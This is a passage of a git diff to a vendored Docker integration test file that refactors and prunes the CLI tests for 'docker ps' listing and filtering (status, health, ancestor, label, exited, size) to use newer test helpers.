b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go index 19ede90d5a..a975bc3542 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go @@ -2,33 +2,34 @@ package main import ( "fmt" - "io/ioutil" - "os" - "os/exec" - "path/filepath" "sort" "strconv" "strings" "time" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/docker/docker/pkg/stringid" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestPsListContainersBase(c *check.C) { - out, _ := runSleepingContainer(c, "-d") + existingContainers := ExistingContainerIDs(c) + + out := runSleepingContainer(c, "-d") firstID := strings.TrimSpace(out) - out, _ = runSleepingContainer(c, "-d") + out = runSleepingContainer(c, "-d") secondID := strings.TrimSpace(out) // not long running out, _ = dockerCmd(c, "run", "-d", "busybox", "true") thirdID := strings.TrimSpace(out) - out, _ = runSleepingContainer(c, "-d") + out = runSleepingContainer(c, "-d") fourthID := strings.TrimSpace(out) // make sure the second is running @@ -42,79 +43,79 @@ func (s *DockerSuite) TestPsListContainersBase(c *check.C) { // all out, _ = dockerCmd(c, "ps", "-a") - c.Assert(assertContainerList(out, []string{fourthID, thirdID, secondID, firstID}), checker.Equals, true, check.Commentf("ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), []string{fourthID, thirdID, secondID, firstID}), checker.Equals, true, check.Commentf("ALL: Container list is not in the correct order: \n%s", out)) // running out, _ = dockerCmd(c, "ps") - c.Assert(assertContainerList(out, []string{fourthID, secondID, firstID}), checker.Equals, true, check.Commentf("RUNNING: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), []string{fourthID, secondID, firstID}), checker.Equals, true, check.Commentf("RUNNING: Container list is not in the correct order: \n%s", out)) // limit out, _ = dockerCmd(c, "ps", "-n=2", "-a") expected := []string{fourthID, thirdID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("LIMIT & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-n=2") - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("LIMIT: Container list is not in the correct order: \n%s", out)) // filter since out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-a") expected = []string{fourthID, thirdID, secondID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "since="+firstID) expected = []string{fourthID, secondID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "since="+thirdID) expected = []string{fourthID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) // filter before out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-a") expected = []string{thirdID, secondID, firstID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID) expected = []string{secondID, firstID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "before="+thirdID) expected = []string{secondID, firstID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) // filter since & before out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-a") expected = []string{thirdID, secondID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID) expected = []string{secondID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter: Container list is not in the correct order: \n%s", out)) // filter since & limit out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2", "-a") expected = []string{fourthID, thirdID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2") - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT: Container list is not in the correct order: \n%s", out)) // filter before & limit out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1", "-a") expected = []string{thirdID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1") - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) // filter since & filter before & limit out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1", "-a") expected = []string{thirdID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1") - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) } @@ -136,13 +137,6 @@ func assertContainerList(out string, expected []string) bool { return true } -// FIXME(vdemeester) Move this into a unit test in daemon package -func (s *DockerSuite) TestPsListContainersInvalidFilterName(c *check.C) { - out, _, err := dockerCmdWithError("ps", "-f", "invalidFilter=test") - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "Invalid filter") -} - func (s *DockerSuite) TestPsListContainersSize(c *check.C) { // Problematic on Windows as it doesn't report the size correctly @swernli testRequires(c, DaemonIsLinux) @@ -152,20 +146,18 @@ func (s *DockerSuite) TestPsListContainersSize(c *check.C) { baseLines := strings.Split(strings.Trim(baseOut, "\n "), "\n") baseSizeIndex := strings.Index(baseLines[0], "SIZE") baseFoundsize := baseLines[1][baseSizeIndex:] - baseBytes, err := strconv.Atoi(strings.Split(baseFoundsize, " ")[0]) + baseBytes, err := strconv.Atoi(strings.Split(baseFoundsize, "B")[0]) c.Assert(err, checker.IsNil) name := "test_size" dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo 1 > test") - id, err := getIDByName(name) - c.Assert(err, checker.IsNil) + id := getIDByName(c, name) - runCmd := exec.Command(dockerBinary, "ps", "-s", "-n=1") - var out string + var result *icmd.Result wait := make(chan struct{}) go func() { - out, _, err = runCommandWithOutput(runCmd) + result = icmd.RunCommand(dockerBinary, "ps", "-s", "-n=1") close(wait) }() select { @@ -173,99 +165,105 @@ func (s *DockerSuite) TestPsListContainersSize(c *check.C) { case <-time.After(3 * time.Second): c.Fatalf("Calling \"docker ps -s\" timed out!") } - c.Assert(err, checker.IsNil) - lines := strings.Split(strings.Trim(out, "\n "), "\n") + result.Assert(c, icmd.Success) + lines := strings.Split(strings.Trim(result.Combined(), "\n "), "\n") c.Assert(lines, checker.HasLen, 2, check.Commentf("Expected 2 lines for 'ps -s -n=1' output, got %d", len(lines))) sizeIndex := strings.Index(lines[0], "SIZE") idIndex := strings.Index(lines[0], "CONTAINER ID") foundID := lines[1][idIndex : idIndex+12] c.Assert(foundID, checker.Equals, id[:12], check.Commentf("Expected id %s, got %s", id[:12], foundID)) - expectedSize := fmt.Sprintf("%d B", (2 + baseBytes)) + expectedSize := fmt.Sprintf("%dB", 2+baseBytes) foundSize := lines[1][sizeIndex:] c.Assert(foundSize, checker.Contains, expectedSize, check.Commentf("Expected size %q, got %q", expectedSize, foundSize)) } func (s *DockerSuite) TestPsListContainersFilterStatus(c *check.C) { + existingContainers := ExistingContainerIDs(c) + // start exited container - out, _ := dockerCmd(c, "run", "-d", "busybox") + out := cli.DockerCmd(c, "run", "-d", "busybox").Combined() firstID := strings.TrimSpace(out) // make sure the exited container is not running - dockerCmd(c, "wait", firstID) + cli.DockerCmd(c, "wait", firstID) // start running container - out, _ = dockerCmd(c, "run", "-itd", "busybox") + out = cli.DockerCmd(c, "run", "-itd", "busybox").Combined() secondID := strings.TrimSpace(out) // filter containers by exited - out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=exited") + out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=exited").Combined() containerOut := strings.TrimSpace(out) - c.Assert(containerOut, checker.Equals, firstID) + c.Assert(RemoveOutputForExistingElements(containerOut, existingContainers), checker.Equals, firstID) - out, _ = dockerCmd(c, "ps", "-a", "--no-trunc", "-q", "--filter=status=running") + out = cli.DockerCmd(c, "ps", "-a", "--no-trunc", "-q", "--filter=status=running").Combined() containerOut = strings.TrimSpace(out) - c.Assert(containerOut, checker.Equals, secondID) + c.Assert(RemoveOutputForExistingElements(containerOut, existingContainers), checker.Equals, secondID) - result := dockerCmdWithTimeout(time.Second*60, "ps", "-a", "-q", "--filter=status=rubbish") - c.Assert(result, icmd.Matches, icmd.Expected{ + result := cli.Docker(cli.Args("ps", "-a", "-q", "--filter=status=rubbish"), cli.WithTimeout(time.Second*60)) + err := "Invalid filter 'status=rubbish'" + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + err = "Unrecognised filter value for status: rubbish" + } + result.Assert(c, icmd.Expected{ ExitCode: 1, - Err: "Unrecognised filter value for status", + Err: err, }) - // Windows doesn't support pausing of containers - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { // pause running container - out, _ = dockerCmd(c, "run", "-itd", "busybox") + out = cli.DockerCmd(c, "run", "-itd", "busybox").Combined() pausedID := strings.TrimSpace(out) - dockerCmd(c, "pause", pausedID) + cli.DockerCmd(c, "pause", pausedID) // make sure the container is unpaused to let the daemon stop it properly - defer func() { dockerCmd(c, "unpause", pausedID) }() + defer func() { cli.DockerCmd(c, "unpause", pausedID) }() - out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=paused") + out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=paused").Combined() containerOut = strings.TrimSpace(out) - c.Assert(containerOut, checker.Equals, pausedID) + c.Assert(RemoveOutputForExistingElements(containerOut, existingContainers), checker.Equals, pausedID) } } func (s *DockerSuite) TestPsListContainersFilterHealth(c *check.C) { + existingContainers := ExistingContainerIDs(c) // Test legacy no health check - out, _ := runSleepingContainer(c, "--name=none_legacy") + out := runSleepingContainer(c, "--name=none_legacy") containerID := strings.TrimSpace(out) - waitForContainer(containerID) + cli.WaitRun(c, containerID) - out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none") + out = cli.DockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none").Combined() containerOut := strings.TrimSpace(out) c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for legacy none filter, output: %q", containerID, containerOut, out)) // Test no health check specified explicitly - out, _ = runSleepingContainer(c, "--name=none", "--no-healthcheck") + out = runSleepingContainer(c, "--name=none", "--no-healthcheck") containerID = strings.TrimSpace(out) - waitForContainer(containerID) + cli.WaitRun(c, containerID) - out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none") + out = cli.DockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none").Combined() containerOut = strings.TrimSpace(out) c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for none filter, output: %q", containerID, containerOut, out)) // Test failing health check - out, _ = runSleepingContainer(c, "--name=failing_container", "--health-cmd=exit 1", "--health-interval=1s") + out = runSleepingContainer(c, "--name=failing_container", "--health-cmd=exit 1", "--health-interval=1s") containerID = strings.TrimSpace(out) waitForHealthStatus(c, "failing_container", "starting", "unhealthy") - out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=unhealthy") + out = cli.DockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=unhealthy").Combined() containerOut = strings.TrimSpace(out) c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for unhealthy filter, output: %q", containerID, containerOut, out)) // Check passing healthcheck - out, _ = runSleepingContainer(c, "--name=passing_container", "--health-cmd=exit 0", "--health-interval=1s") + out = runSleepingContainer(c, "--name=passing_container", "--health-cmd=exit 0", "--health-interval=1s") containerID = strings.TrimSpace(out) waitForHealthStatus(c, "passing_container", "starting", "healthy") - out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=healthy") - containerOut = strings.TrimSpace(out) + out = cli.DockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=healthy").Combined() + containerOut = strings.TrimSpace(RemoveOutputForExistingElements(out, existingContainers)) c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for healthy filter, output: %q", containerID, containerOut, out)) } @@ -286,8 +284,7 @@ func (s *DockerSuite) TestPsListContainersFilterID(c *check.C) { func (s *DockerSuite) TestPsListContainersFilterName(c *check.C) { // start container dockerCmd(c, "run", "--name=a_name_to_match", "busybox") - id, err := getIDByName("a_name_to_match") - c.Assert(err, check.IsNil) + id := getIDByName(c, "a_name_to_match") // start another container runSleepingContainer(c, "--name=b_name_to_match") @@ -307,49 +304,43 @@ func (s *DockerSuite) TestPsListContainersFilterName(c *check.C) { // - Run containers for each of those image (busybox, images_ps_filter_test1, images_ps_filter_test2) // - Filter them out :P func (s *DockerSuite) TestPsListContainersFilterAncestorImage(c *check.C) { + existingContainers := ExistingContainerIDs(c) + // Build images imageName1 := "images_ps_filter_test1" - imageID1, err := buildImage(imageName1, - `FROM busybox - LABEL match me 1`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, imageName1, build.WithDockerfile(`FROM busybox + LABEL match me 1`)) + imageID1 := getIDByName(c, imageName1) imageName1Tagged := "images_ps_filter_test1:tag" - imageID1Tagged, err := buildImage(imageName1Tagged, - `FROM busybox - LABEL match me 1 tagged`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, imageName1Tagged, build.WithDockerfile(`FROM busybox + LABEL match me 1 tagged`)) + imageID1Tagged := getIDByName(c, imageName1Tagged) imageName2 := "images_ps_filter_test2" - imageID2, err := buildImage(imageName2, - fmt.Sprintf(`FROM %s - LABEL match me 2`, imageName1), true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, imageName2, build.WithDockerfile(fmt.Sprintf(`FROM %s + LABEL match me 2`, imageName1))) + imageID2 := getIDByName(c, imageName2) // start containers dockerCmd(c, "run", "--name=first", "busybox", "echo", "hello") - firstID, err := getIDByName("first") - c.Assert(err, check.IsNil) + firstID := getIDByName(c, "first") // start another container dockerCmd(c, "run", "--name=second", "busybox", "echo", "hello") - secondID, err := getIDByName("second") - c.Assert(err, check.IsNil) + secondID := getIDByName(c, "second") // start third container dockerCmd(c, "run", "--name=third", imageName1, "echo", "hello") - thirdID, err := getIDByName("third") - c.Assert(err, check.IsNil) + thirdID := getIDByName(c, "third") // start fourth container dockerCmd(c, "run", "--name=fourth", imageName1Tagged, "echo", "hello") - fourthID, err := getIDByName("fourth") - c.Assert(err, check.IsNil) + fourthID := getIDByName(c, "fourth") // start fifth container dockerCmd(c, "run", "--name=fifth", imageName2, "echo", "hello") - fifthID, err := getIDByName("fifth") - c.Assert(err, check.IsNil) + fifthID := getIDByName(c, "fifth") var filterTestSuite = []struct { filterName string @@ -377,16 +368,16 @@ func (s *DockerSuite) TestPsListContainersFilterAncestorImage(c *check.C) { var out string for _, filter := range filterTestSuite { out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+filter.filterName) - checkPsAncestorFilterOutput(c, out, filter.filterName, filter.expectedIDs) + checkPsAncestorFilterOutput(c, RemoveOutputForExistingElements(out, existingContainers), filter.filterName, filter.expectedIDs) } // Multiple ancestor filter out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageName2, "--filter=ancestor="+imageName1Tagged) - checkPsAncestorFilterOutput(c, out, imageName2+","+imageName1Tagged, []string{fourthID, fifthID}) + checkPsAncestorFilterOutput(c, RemoveOutputForExistingElements(out, existingContainers), imageName2+","+imageName1Tagged, []string{fourthID, fifthID}) } func checkPsAncestorFilterOutput(c *check.C, out string, filterName string, expectedIDs []string) { - actualIDs := []string{} + var actualIDs []string if out != "" { actualIDs = strings.Split(out[:len(out)-1], "\n") } @@ -410,18 +401,15 @@ func checkPsAncestorFilterOutput(c *check.C, out string, filterName string, expe func (s *DockerSuite) TestPsListContainersFilterLabel(c *check.C) { // start container dockerCmd(c, "run", "--name=first", "-l", "match=me", "-l", "second=tag", "busybox") - firstID, err := getIDByName("first") - c.Assert(err, check.IsNil) + firstID := getIDByName(c, "first") // start another container dockerCmd(c, "run", "--name=second", "-l", "match=me too", "busybox") - secondID, err := getIDByName("second") - c.Assert(err, check.IsNil) + secondID := getIDByName(c, "second") // start third container dockerCmd(c, "run", "--name=third", "-l", "nomatch=me", "busybox") - thirdID, err := getIDByName("third") - c.Assert(err, check.IsNil) + thirdID := getIDByName(c, "third") // filter containers by exact match out, _ := dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me") @@ -450,23 +438,19 @@ func (s *DockerSuite) TestPsListContainersFilterExited(c *check.C) { runSleepingContainer(c, "--name=sleep") dockerCmd(c, "run", "--name", "zero1", "busybox", "true") - firstZero, err := getIDByName("zero1") - c.Assert(err, checker.IsNil) + firstZero := getIDByName(c, "zero1") dockerCmd(c, "run", "--name", "zero2", "busybox", "true") - secondZero, err := getIDByName("zero2") - c.Assert(err, checker.IsNil) + secondZero := getIDByName(c, "zero2") out, _, err := dockerCmdWithError("run", "--name", "nonzero1", "busybox", "false") c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err)) - firstNonZero, err := getIDByName("nonzero1") - c.Assert(err, checker.IsNil) + firstNonZero := getIDByName(c, "nonzero1") out, _, err = dockerCmdWithError("run", "--name", "nonzero2", "busybox", "false") c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err)) - secondNonZero, err := getIDByName("nonzero2") - c.Assert(err, checker.IsNil) + secondNonZero := getIDByName(c, "nonzero2") // filter containers by exited=0 out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=exited=0") @@ -486,15 +470,18 @@ func (s *DockerSuite) TestPsListContainersFilterExited(c *check.C) { func (s *DockerSuite) TestPsRightTagName(c *check.C) { // TODO Investigate further why this fails on Windows to Windows CI testRequires(c, DaemonIsLinux) + + existingContainers := ExistingContainerNames(c) + tag := "asybox:shmatest" dockerCmd(c, "tag", "busybox", tag) var id1 string - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id1 = strings.TrimSpace(string(out)) var id2 string - out, _ = runSleepingContainerInImage(c, tag) + out = runSleepingContainerInImage(c, tag) id2 = strings.TrimSpace(string(out)) var imageID string @@ -502,11 +489,12 @@ func (s *DockerSuite) TestPsRightTagName(c *check.C) { imageID = strings.TrimSpace(string(out)) var id3 string - out, _ = runSleepingContainerInImage(c, imageID) + out = runSleepingContainerInImage(c, imageID) id3 = strings.TrimSpace(string(out)) out, _ = dockerCmd(c, "ps", "--no-trunc") lines := strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) // skip header lines = lines[1:] c.Assert(lines, checker.HasLen, 3, check.Commentf("There should be 3 running container, got %d", len(lines))) @@ -525,46 +513,6 @@ func (s *DockerSuite) TestPsRightTagName(c *check.C) { } } -func (s *DockerSuite) TestPsLinkedWithNoTrunc(c *check.C) { - // Problematic on Windows as it doesn't support links as of Jan 2016 - testRequires(c, DaemonIsLinux) - runSleepingContainer(c, "--name=first") - runSleepingContainer(c, "--name=second", "--link=first:first") - - out, _ := dockerCmd(c, "ps", "--no-trunc") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - // strip header - lines = lines[1:] - expected := []string{"second", "first,second/first"} - var names []string - for _, l := range lines { - fields := strings.Fields(l) - names = append(names, fields[len(fields)-1]) - } - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array: %v, got: %v", expected, names)) -} - -func (s *DockerSuite) TestPsGroupPortRange(c *check.C) { - // Problematic on Windows as it doesn't support port ranges as of Jan 2016 - testRequires(c, DaemonIsLinux) - portRange := "3850-3900" - dockerCmd(c, "run", "-d", "--name", "porttest", "-p", portRange+":"+portRange, "busybox", "top") - - out, _ := dockerCmd(c, "ps") - - c.Assert(string(out), checker.Contains, portRange, check.Commentf("docker ps output should have had the port range %q: %s", portRange, string(out))) - -} - -func (s *DockerSuite) TestPsWithSize(c *check.C) { - // Problematic on Windows as it doesn't report the size correctly @swernli - testRequires(c, DaemonIsLinux) - dockerCmd(c, "run", "-d", "--name", "sizetest", "busybox", "top") - - out, _ := dockerCmd(c, "ps", "--size") - c.Assert(out, checker.Contains, "virtual", check.Commentf("docker ps with --size should show virtual size of container")) -} - func (s *DockerSuite) TestPsListContainersFilterCreated(c *check.C) { // create a container out, _ := dockerCmd(c, "create", "busybox") @@ -595,73 +543,6 @@ func (s *DockerSuite) TestPsListContainersFilterCreated(c *check.C) { c.Assert(cID, checker.HasPrefix, containerOut) } -func (s *DockerSuite) TestPsFormatMultiNames(c *check.C) { - // Problematic on Windows as it doesn't support link as of Jan 2016 - testRequires(c, DaemonIsLinux) - //create 2 containers and link them - dockerCmd(c, "run", "--name=child", "-d", "busybox", "top") - dockerCmd(c, "run", "--name=parent", "--link=child:linkedone", "-d", "busybox", "top") - - //use the new format capabilities to only list the names and --no-trunc to get all names - out, _ := dockerCmd(c, "ps", "--format", "{{.Names}}", "--no-trunc") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - expected := []string{"parent", "child,parent/linkedone"} - var names []string - names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with non-truncated names: %v, got: %v", expected, names)) - - //now list without turning off truncation and make sure we only get the non-link names - out, _ = dockerCmd(c, "ps", "--format", "{{.Names}}") - lines = strings.Split(strings.TrimSpace(string(out)), "\n") - expected = []string{"parent", "child"} - var truncNames []string - truncNames = append(truncNames, lines...) - c.Assert(expected, checker.DeepEquals, truncNames, check.Commentf("Expected array with truncated names: %v, got: %v", expected, truncNames)) -} - -// Test for GitHub issue #21772 -func (s *DockerSuite) TestPsNamesMultipleTime(c *check.C) { - runSleepingContainer(c, "--name=test1") - runSleepingContainer(c, "--name=test2") - - //use the new format capabilities to list the names twice - out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Names}}") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - expected := []string{"test2 test2", "test1 test1"} - var names []string - names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with names displayed twice: %v, got: %v", expected, names)) -} - -func (s *DockerSuite) TestPsFormatHeaders(c *check.C) { - // make sure no-container "docker ps" still prints the header row - out, _ := dockerCmd(c, "ps", "--format", "table {{.ID}}") - c.Assert(out, checker.Equals, "CONTAINER ID\n", check.Commentf(`Expected 'CONTAINER ID\n', got %v`, out)) - - // verify that "docker ps" with a container still prints the header row also - runSleepingContainer(c, "--name=test") - out, _ = dockerCmd(c, "ps", "--format", "table {{.Names}}") - c.Assert(out, checker.Equals, "NAMES\ntest\n", check.Commentf(`Expected 'NAMES\ntest\n', got %v`, out)) -} - -func (s *DockerSuite) TestPsDefaultFormatAndQuiet(c *check.C) { - config := `{ - "psFormat": "default {{ .ID }}" -}` - d, err := ioutil.TempDir("", "integration-cli-") - c.Assert(err, checker.IsNil) - defer os.RemoveAll(d) - - err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) - c.Assert(err, checker.IsNil) - - out, _ := runSleepingContainer(c, "--name=test") - id := strings.TrimSpace(out) - - out, _ = dockerCmd(c, "--config", d, "ps", "-q") - c.Assert(id, checker.HasPrefix, strings.TrimSpace(out), check.Commentf("Expected to print only the container id, got %v\n", out)) -} - // Test for GitHub issue #12595 func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) { // TODO: Investigate why this fails on Windows to Windows CI further. @@ -669,22 +550,21 @@ func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) { originalImageName := "busybox:TestPsImageIDAfterUpdate-original" updatedImageName := "busybox:TestPsImageIDAfterUpdate-updated" - runCmd := exec.Command(dockerBinary, "tag", "busybox:latest", originalImageName) - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.IsNil) + existingContainers := ExistingContainerIDs(c) - originalImageID, err := getIDByName(originalImageName) - c.Assert(err, checker.IsNil) + icmd.RunCommand(dockerBinary, "tag", "busybox:latest", originalImageName).Assert(c, icmd.Success) - runCmd = exec.Command(dockerBinary, append([]string{"run", "-d", originalImageName}, sleepCommandForDaemonPlatform()...)...) - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.IsNil) - containerID := strings.TrimSpace(out) + originalImageID := getIDByName(c, originalImageName) - linesOut, err := exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput() - c.Assert(err, checker.IsNil) + result := icmd.RunCommand(dockerBinary, append([]string{"run", "-d", originalImageName}, sleepCommandForDaemonPlatform()...)...) + result.Assert(c, icmd.Success) + containerID := strings.TrimSpace(result.Combined()) + + result = icmd.RunCommand(dockerBinary, "ps", "--no-trunc") + result.Assert(c, icmd.Success) - lines := strings.Split(strings.TrimSpace(string(linesOut)), "\n") + lines := strings.Split(strings.TrimSpace(string(result.Combined())), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) // skip header lines = lines[1:] c.Assert(len(lines), checker.Equals, 1) @@ -694,18 +574,14 @@ func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) { c.Assert(f[1], checker.Equals, originalImageName) } - runCmd = exec.Command(dockerBinary, "commit", containerID, updatedImageName) - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.IsNil) - - runCmd = exec.Command(dockerBinary, "tag", updatedImageName, originalImageName) - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.IsNil) + icmd.RunCommand(dockerBinary, "commit", containerID, updatedImageName).Assert(c, icmd.Success) + icmd.RunCommand(dockerBinary, "tag", updatedImageName, originalImageName).Assert(c, icmd.Success) - linesOut, err = exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput() - c.Assert(err, checker.IsNil) + result = icmd.RunCommand(dockerBinary, "ps", "--no-trunc") + result.Assert(c, icmd.Success) - lines 